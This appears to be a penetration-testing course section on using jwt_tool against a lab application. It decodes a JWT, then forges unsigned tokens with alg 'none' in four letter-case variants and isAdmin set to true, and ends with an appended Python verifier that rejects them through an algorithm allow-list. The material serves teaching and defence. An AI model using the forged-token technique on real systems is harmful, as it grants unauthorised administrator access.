Tools of the Trade & Vulnerability Prevention
Tools of the Trade
Penetration testers commonly use jwt_tool to analyze and identify vulnerabilities in JWTs. The installation process only requires cloning the repository and installing the required dependencies:
eldeim@htb[/htb]$ git clone https://github.com/ticarpi/jwt_tool
eldeim@htb[/htb]$ pip3 install -r requirements.txt
We can then run the tool by executing the Python script jwt_tool.py:
From the output of jwt_tool.py, we know that it can analyze JWTs, brute-force JWT secrets, and perform various other attacks, including those discussed in previous sections.
JWT Analysis
We can analyze any given JWT with jwt_tool by providing it as an argument. Let us test it with a JWT from a previous section:
eldeim@htb[/htb]$ python3 jwt_tool/jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6ZmFsc2UsImV4cCI6MTcxMTE4NjA0NH0.ecpzHiyA5I1-KYTTF251bUiUM-tNnrIMwvHeSZf0eB0
=====================
Decoded Token Values:
=====================
Token header values:
[+] alg = "HS256"
[+] typ = "JWT"
Token payload values:
[+] user = "htb-stdnt"
[+] isAdmin = False
[+] exp = 1711186044 ==> TIMESTAMP = 2024-03-23 10:27:24 (UTC)
[-] TOKEN IS EXPIRED!
----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------
As we can see, the tool provides us with all the information contained in the JWT, including both the header and the payload. It even lets us know that the provided token has already expired, since the timestamp in the exp claim is in the past.
Forging JWTs
We can use jwt_tool to programmatically forge altered JWTs instead of doing so manually, as in the previous sections. For instance, we can forge a JWT which uses the none algorithm by specifying the -X a flag. Additionally, we can tell the tool to set the isAdmin claim to true by specifying the following flags: -pc isAdmin -pv true -I. Let us combine these flags to forge a JWT that enables us to obtain administrator privileges in the lab from the previous sections:
eldeim@htb[/htb]$ python3 jwt_tool/jwt_tool.py -X a -pc isAdmin -pv true -I eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6ZmFsc2UsImV4cCI6MTcxMTE4NjA0NH0.ecpzHiyA5I1-KYTTF251bUiUM-tNnrIMwvHeSZf0eB0
<SNIP>
jwttool_811c498343f37b0d48592a9743187ebf - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ.
jwttool_fb9f8d45657b7264e23d8e17a2cc438e - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOb25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ.
jwttool_c2d4f2dda19221badff0ee7d78e80575 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ.
jwttool_367f25ee04f77adb0cb665bf07d80f3c - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJuT25FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ.
As we can see, the tool generated JWTs that use the none algorithm with various lower- and uppercase combinations, aiming to bypass potential blacklists. We can confirm that the token contains the claims we injected by analyzing it:
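As an added defensive counterpart (example code written for this section, not part of the page or of jwt_tool): a minimal verifier that shows why the case variants above are rejected when the server matches alg against an exact allow-list before ever looking at the signature, and then checks the signature and exp. It uses the tokens printed above as input; the HS256 secret it signs with is a constructed value, not the lab's.

```python
import base64
import hashlib
import hmac
import json
import time

# Assumption: the verifier is configured with a fixed allow-list of algorithms.
# Exact, case-sensitive matching means "none", "None", "NONE" and "nOnE" all fail.
ALLOWED_ALGS = {"HS256"}


def b64url_decode(segment):
    # JWT segments are base64url without padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_unverified(token):
    """Split a compact JWT into (header, payload, signature) without verifying it."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("token must have exactly three segments")
    return json.loads(b64url_decode(parts[0])), json.loads(b64url_decode(parts[1])), parts[2]


def sign_hs256(payload, secret):
    """Issue an HS256 token; used here only to build a known-good sample (constructed)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url_encode(json.dumps(payload).encode())
    mac = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(mac)}"


def verify(token, secret, now=None):
    """Return (accepted, reason): algorithm allow-list first, then signature, then exp."""
    header, payload, sig = decode_unverified(token)
    alg = header.get("alg")
    if alg not in ALLOWED_ALGS:
        return False, f"alg {alg!r} not allowed"
    signing_input = token.rsplit(".", 1)[0].encode()
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        return False, "bad signature"
    now = int(time.time()) if now is None else now
    if "exp" in payload and now >= int(payload["exp"]):
        return False, "token expired"
    return True, "ok"
```

Feeding the four unsigned tokens from the jwt_tool output into verify() fails on the allow-list check regardless of the secret, which is the behaviour a patched library should exhibit.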